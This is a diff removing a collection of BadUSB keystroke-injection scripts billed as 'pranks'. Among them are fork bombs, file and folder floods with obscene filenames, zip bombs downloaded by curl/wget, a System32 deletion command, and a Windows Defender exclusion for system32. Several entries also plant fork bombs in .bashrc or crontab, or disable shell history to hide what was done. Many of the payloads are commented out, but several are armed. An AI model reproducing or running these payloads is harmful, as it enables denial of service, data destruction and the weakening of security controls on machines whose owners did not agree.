STRING $Window.ShowDialog()
DELAY 500
ENTER
DELAY 2000
STRING exit
DELAY 500
ENTER
REM check out my github at github.com/markcyber for more badusb & hacking type tools

62
badusb/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt
View file

@ -1,62 +0,0 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 2000
STRING powershell
ENTER
REM increased delays to make sure each command can go through even on slower computers
DELAY 6000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 1000
ENTER
DELAY 1000
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 1000
ENTER
DELAY 2000
STRING )
DELAY 1000
ENTER
DELAY 3000
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 1000
ENTER
DELAY 1000
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 1000
ENTER
DELAY 4000
REM Get all .locked files in the path and rename them back
STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
DELAY 2000
ENTER
DELAY 5000
STRING }
DELAY 1000
ENTER
DELAY 4000
STRING exit
DELAY 1000
ENTER
REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff

24
badusb/Bombs/32_wants_the_D.txt
View file

@ -1,24 +0,0 @@
REM Title:32 wants the D
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, my friends and memes
REM Version: 1.0
REM Category: Prank
REM D as in DELETE! Deletes System32. I wrote the draft with my friend as an educational lesson to show them just how easy it is to write ducky, I then combed through MS doc's on those 3 commands to refine them and tested later for this.
REM
REM THIS WILL DELETE THINGS AND MAKE COMPUTER UNHAPPY
REM Uncomment out the string below to arm the script.
REM Also... don't be a dick to n00bs. =)
REM For educational/sysadmin purposes, as a reminder destruction of property IS A CRIME!
REM As always just follow the golden rule "DON"T BE A DICK!"
REM
DELAY 500
GUI r
DELAY 500
STRING cmd
CTRL-SHIFT ENTER
DELAY 2000
ALT y
DELAY 1500
REM STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
ENTER

18
badusb/Bombs/File_Bomb/Linuxpy.txt
View file

@ -1,18 +0,0 @@
REM Title: File Bomb Tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04.
REM Props: Hak5, PauloVicente89 for the py script I modified for linux and memes
REM Version: 1.0
REM Category: Prank
REM Launches a terminal, background wgets the py script and runs it.
REM
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
REM STRING nohup wget https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/File_bomb/PLTUX.py 2>/dev/null && python3 PLTUX.py 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

18
badusb/Bombs/File_Bomb/LinuxpyBF.txt
View file

File diff suppressed because one or more lines are too long

19
badusb/Bombs/File_Bomb/Linuxsh.txt
View file

@ -1,19 +0,0 @@
REM Title: File bomb
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, the community and memes
REM Version: 1.0
REM Category: Prank
REM Launches a terminal, spawns 420 txt files in each home dir, home, and root. Change the 420 to 100000 or something if you want more files.
REM
REM initialization delay
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM STRING nohup cd /Home/Pictures && touch {1..420}.txt 2>/dev/null & cd /Home/Documents && touch {1..420}.txt 2>/dev/null & cd /Home/Music && touch {1..420}.txt 2>/dev/null & cd /Home/Videos && touch {1..420}.txt 2>/dev/null & cd /Home/Desktop && touch {1..420}.txt 2>/dev/null & cd /dev/shm && touch {1..420}.txt 2>/dev/null & cd .. && touch {1..420}.txt 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

26
badusb/Bombs/File_Bomb/LinuxshWL.txt
View file

@ -1,26 +0,0 @@
REM Title: File bomb word list tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM changes to all the main dir's in home, then home, then root and creates negative named files in each
REM
REM initialization delay
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
REM adjust delay as needed
DELAY 1500
REM sneak +1 don't delete the whole history or mess with size settings, just turn history off and delete the history change entry ;)
STRING set +o history
DELAY 200
ENTER
DELAY 200
REM STRING nohup cd /Home/Pictures && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Documents && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Music && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Videos && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Desktop && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick && history | grep history && line=$(history | grep history | awk '{ print $1 }') && history -d $line && set -o history &
DELAY 500
ENTER
DELAY 300
ALT F4

20
badusb/Bombs/File_Bomb/LinuxshWLevil.txt
View file

File diff suppressed because one or more lines are too long

20
badusb/Bombs/File_Bomb/LinuxshWLmean.txt
View file

@ -1,20 +0,0 @@
REM Title: File bomb word list tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM changes to all the main dir's in home, then home, then root and creates negative named files in each, mean version which I used gpt3 to generate longer word list for a meaner script. Apparently I can only get it to say poopoo head over and over, so this is what I mined lol.
REM
REM initialization delay
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM STRING nohup cd /Home/Pictures && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Documents && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Music && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Videos && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd /Home/Desktop && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain &
DELAY 2000
ENTER
DELAY 500
ALT F4

17
badusb/Bombs/File_Bomb/LinuxshWLmean_bluepill.txt
View file

@ -1,17 +0,0 @@
REM Title: File bomb
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM Reverse to the mean quack to not make your friends hate you, changes to all the main dir's in home, then home, then root and deletes negative named files in each.
REM initialization delay
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
STRING cd /Home/Pictures && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Documents && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Music && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Videos && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd /Home/Desktop && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd .. && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain && cd .. && rm 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick poopoo_breath cum_dumpster fart_breath ass_eater turd_burglar butt_munch crap_monster turd_face shit_stain shit_eater asshat asshole fuck_stick slut whore cunt dickhead shit_weasel prick motherfucker whorebag dickwad fucktard shitstain butt_pirate skank_fuck whore_monger dickwad shit_stain
DELAY 2000
ENTER

18
badusb/Bombs/Folder_Bomb/Linuxbash.txt
View file

@ -1,18 +0,0 @@
REM Title: Folder Bomb Tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04.
REM Props: Hak5, the community and memes
REM Version: 1.0
REM Category: Prank
REM Launches a terminal, spawns 420 folders in each home dir, home, and root. Change the 420 to 100000 or something if you want more folders.
REM
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
REM STRING nohup cd /Home/Pictures && mkdir folder{1..420} 2>/dev/null & cd /Home/Documents && mkdir folder{1..420} 2>/dev/null & cd /Home/Music && mkdir folder{1..420} 2>/dev/null & cd /Home/Videos && mkdir folder{1..420} 2>/dev/null & cd /Home/Desktop && mkdir folder{1..420} 2>/dev/null & cd .. && mkdir folder{1..420} 2>/dev/null & cd .. && mkdir folder{1..420} 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

18
badusb/Bombs/Folder_Bomb/Linuxpy.txt
View file

@ -1,18 +0,0 @@
REM Title: Folder Bomb Tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04.
REM Props: Hak5, PauloVicente89 for the py script I modified for linux and memes
REM Version: 1.0
REM Category: Prank
REM Launches a terminal, background wgets the py script and runs it. It created about 100k folders in about 5 seconds from my testing.
REM
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
REM STRING nohup wget https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/Folder_Bomb/PLTUX.py 2>/dev/null && python3 PLTUX.py 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

18
badusb/Bombs/Folder_Bomb/LinuxpyBF.txt
View file

File diff suppressed because one or more lines are too long

17
badusb/Bombs/GooseCrasher.txt
View file

@ -1,17 +0,0 @@
REM Title: Desktop Goose crasher
REM Author: FalsePhilosopher
REM Target: Windows 10+
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
REM Version: 1.0
REM Category: Prank
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? This version spawns ALL THE GEESE!
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM STRING powershell -w h -NoP -NonI ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/UberGuidoZ/FalsePhilosopher-BadUSB-Playground/raw/89f0c34e05fbf9926d6524b154d9d7be99763665/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;;powershell -Exec Bypass "while (1) {$D\dgc.ps1}"
ENTER

20
badusb/Bombs/Rick_Roll/RR-fileBomb-Win.txt
View file

@ -1,20 +0,0 @@
REM Title: Powershell RickRoll FileBomb
REM Author: 7h30th3r0n3
REM Props: UberGuidoZ for the playground database: https://github.com/UberGuidoZ/Flipper
REM Target: Windows 7/8/10/11
REM Version: 1.0
REM Category: Prank
REM start a powershell and fill the default windows folders with all Rick's lyrics
REM
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
STRING function RRfolder {mkdir Desert_you;mkdir Ooh-ooh-ooh-ooh;mkdir Hurt_you;mkdir We-re_no_strangers_to_love;mkdir You_know_the_rules_and_so_do_I;mkdir A_full_commitment-s_what_I-m_thinking_of;mkdir You_wouldn-t_get_this_from_any_other_guy;mkdir Gotta_make_you_understand;mkdir Never_gonna_give_you_up;mkdir Never_gonna_let_you_down;mkdir Never_gonna_run_around_and_desert_you;mkdir Never_gonna_make_you_cry;mkdir Never_gonna_say_goodbye;mkdir Never_gonna_tell_a_lie_and_hurt_you;mkdir We-ve_known_each_other_for_so_long;mkdir Your_heart-s_been_aching_but_you-re_too_shy_to_say_it;mkdir Inside_we_both_know_what-s_been_going_on;mkdir We_know_the_game_and_we-re_gonna_play_it;mkdir And_if_you_ask_me_how_I-m_feeling;mkdir Don-t_tell_me_you-re_too_blind_to_see;mkdir Ooh__Give_you_up_;mkdir Ooh-ooh__Give_you_up_;mkdir Ooh-ooh;mkdir Never_gonna_give_never_gonna_give;mkdir I_just_wanna_tell_you_how_I-m_feeling;}
ENTER
DELAY 200
STRING cd C:\Users\$env:UserName\Desktop;RRfolder;cd C:\Users\$env:UserName\Downloads;RRfolder;cd C:\Users\$env:UserName\Documents;RRfolder;cd C:\Users\$env:UserName\Favorites;RRfolder;cd C:\Users\$env:UserName\Links;RRfolder;cd C:\Users\$env:UserName\Music;RRfolder;cd C:\Users\$env:UserName\Videos;RRfolder;cd C:\Users\$env:UserName\Contacts;RRfolder;
ENTER
STRING exit
ENTER

20
badusb/Bombs/Rick_Roll/RR-fileBomb-chorus-Win.txt
View file

@ -1,20 +0,0 @@
REM Title: Powershell RickRoll Chorus FileBomb
REM Author: 7h30th3r0n3
REM Props: UberGuidoZ for the playground database: https://github.com/UberGuidoZ/Flipper
REM Target: Windows 7/8/10/11
REM Version: 1.0
REM Category: Prank
REM start a powershell and fill the default windows folders with Rick's chorus lyrics
REM
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
STRING function RRfolder {mkdir Never_gonna_give_you_up;mkdir Never_gonna_let_you_down;mkdir Never_gonna_run_around_and_desert_you;mkdir Never_gonna_make_you_cry;mkdir Never_gonna_say_goodbye;mkdir Never_gonna_tell_a_lie_and_hurt_you;}
ENTER
DELAY 200
STRING cd C:\Users\$env:UserName\Desktop;RRfolder;cd C:\Users\$env:UserName\Downloads;RRfolder;cd C:\Users\$env:UserName\Documents;RRfolder;cd C:\Users\$env:UserName\Favorites;RRfolder;cd C:\Users\$env:UserName\Links;RRfolder;cd C:\Users\$env:UserName\Music;RRfolder;cd C:\Users\$env:UserName\Videos;RRfolder;cd C:\Users\$env:UserName\Contacts;RRfolder;
ENTER
STRING exit
ENTER

22
badusb/Bombs/Sys_Forker/ForkBomb-Linux.txt
View file

@ -1,22 +0,0 @@
REM Title: Terminal forkbomb
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04.
REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going.
REM Version: 1.0
REM Category: Prank
REM Launches terminal and spawns a terminal forkbomb
REM
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
REM STRING :(){ :|:& };:
ENTER
REM If you want to do it in the background so you can close the terminal with adding ALT F4
REM STRING nohup :(){ :|:& };: >> /dev/null & disown
REM if you want to do it every time they open a terminal like drapl0n's terminalbomb style
REM STRING echo ":(){ :|:& };:" >> ~/.bashrc
REM if you want to make it happen every hour
REM STRING crontab -l | sed "\$a\@hourly sh :(){ :|:& };:" | crontab -

21
badusb/Bombs/Sys_Forker/ForkBomb-Linuxmean.txt
View file

@ -1,21 +0,0 @@
REM Title: terminal bomb
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, drapl0n for the OG termbomb, the community and memes
REM Version: 1.0
REM Category: Recon
REM Starts a forkbomb every time they open a terminal, if you want a more elequently written one check out drapl0n's PL as this is just a basic one liner. Simple but effective with less points of failure.
REM Lamp oil, rope? Bombs! You want it? It's yours my friend! As long as you have enough Rupees!
REM
REM initialization delay
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM STRING echo ":(){ :|:& };:" >> ~/.zshrc && echo ":(){ :|:& };:" >> ~/.bashrc
DELAY 300
ENTER
DELAY 500
ALT F4

16
badusb/Bombs/Sys_Forker/ForkBomb-Win.txt
View file

@ -1,16 +0,0 @@
REM Title: CMD forkbomb
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10/11
REM Version: 1.0
REM Category: Prank
REM Launches CMD and spawns a CMD forkbomb which create a waterfall of cmd and crash the pc
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 300
STRING (echo :b && echo start b.bat && echo goto b)>b.bat
ENTER
DELAY 300
REM STRING b.bat
ENTER

18
badusb/Bombs/Sys_Forker/ForkBomb-Win2.txt
View file

@ -1,18 +0,0 @@
REM Title: Win forkbomb variant 2
REM Author: FalsePhilosopher
REM Target: XP-11
REM Props: Hak5, da3m0n s3c for the one liner, UberGuidoZ for keeping the flipper repo going.
REM Version: 1.0
REM Category: Prank
REM Launches terminal and spawns a terminal forkbomb, if you want forkers in multiple languages head here https://da3m0ns3c.blogspot.com/2017/04/fork-bomb-in-several-language-implements.html
REM
DELAY 300
GUI r
DELAY 500
STRING cmd.exe
DELAY 200
ENTER
DELAY 2000
STRING echo %0^|%0 > forkbomb.bat && forkbomb.bat
DELAY 200
ENTER

20
badusb/Bombs/Sys_Forker/Forkbomb-Win_10-11.txt
View file

@ -1,20 +0,0 @@
REM Title: Win forkbomb, thread shitter or ryzen temps
REM Author: FalsePhilosopher
REM Target:10-11
REM Props: Hak5, da3m0n s3c for the one liner https://da3m0ns3c.blogspot.com/2017/04/fork-bomb-in-several-language-implements.html, the community and memes
REM Version: 1.0
REM Category: Prank
REM Launches terminal and spawns a forkbomb on every thread the system reports that then spawns shells that spawn forkbombs. It spawned about 850 processes in 15 seconds, there is no stopping it so be careful testing this thing is NASTY! It takes 5-10 sec to spin up the run pools so it's not immediate.
REM
DELAY 300
GUI r
DELAY 500
STRING cmd.exe
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
REM STRING echo %0^|%0 > fb.bat&&powershell -w h $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(C:\Windows\System32\fb.bat);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
ENTER

9
badusb/Bombs/You_are_an_Idiot_Web.txt
View file

@ -1,9 +0,0 @@
REM Title: You are an idiot web version
REM Author: FalsePhilosopher
REM Description: Opens a you are an idiot remake website
REM Target: Windows 10+ tested on win 11
REM
DELAY 300
GUI r
DELAY 1000
REM STRINGLN msedge.exe --kiosk https://ygev.github.io/Trojan.JS.YouAreAnIdiot --edge-kiosk-type=fullscreen

18
badusb/Bombs/Zip_Bomb/Linux/quack.txt
View file

@ -1,18 +0,0 @@
REM Title: Zip bomb tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence.
DELAY 300
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM FIRE IN THE HOLE!
REM STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

18
badusb/Bombs/Zip_Bomb/Linux/quackBF.txt
View file

File diff suppressed because one or more lines are too long

18
badusb/Bombs/Zip_Bomb/Linux/quackmean.txt
View file

@ -1,18 +0,0 @@
REM Title: Zip bomb tux style
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04
REM Props: Hak5, strippers and memes
REM Version: 1.0
REM Category: Prank
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence. This version launches one in tmp, $HOME and /dev/shm wtih history covering
DELAY 300
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
REM FIRE IN THE HOLE!
REM STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & unzip 42.zip -d /dev/shm 2>/dev/null & unzip 42.zip -d $HOME 2>/dev/null & disown
ENTER
DELAY 500
ALT F4

18
badusb/Bombs/Zip_Bomb/Linux/quackmeanBF.txt
View file

File diff suppressed because one or more lines are too long

19
badusb/Bombs/Zip_Bomb/Win/quack.txt
View file

@ -1,19 +0,0 @@
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, friends and memes
REM Version: 1.0
REM Category: Prank
REM Launches zip bomb
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 2000
REM STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; Expand-Archive -Path 42.zip -Force
ENTER

19
badusb/Bombs/Zip_Bomb/Win/quackloop.txt
View file

@ -1,19 +0,0 @@
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, friends and memes
REM Version: 1.0
REM Category: Prank
REM Launches zip bomb and openes another after that one is done.
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 2000
REM STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; while (1) { Expand-Archive -Path 42.zip -Force; }
ENTER

19
badusb/Bombs/Zip_Bomb/Win/quackpara.txt
View file

@ -1,19 +0,0 @@
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, friends and memes
REM Version: 1.0
REM Category: Prank
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 2000
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;$NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
ENTER

19
badusb/Bombs/Zip_Bomb/Win/quackparaloop10.txt
View file

@ -1,19 +0,0 @@
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, friends and memes
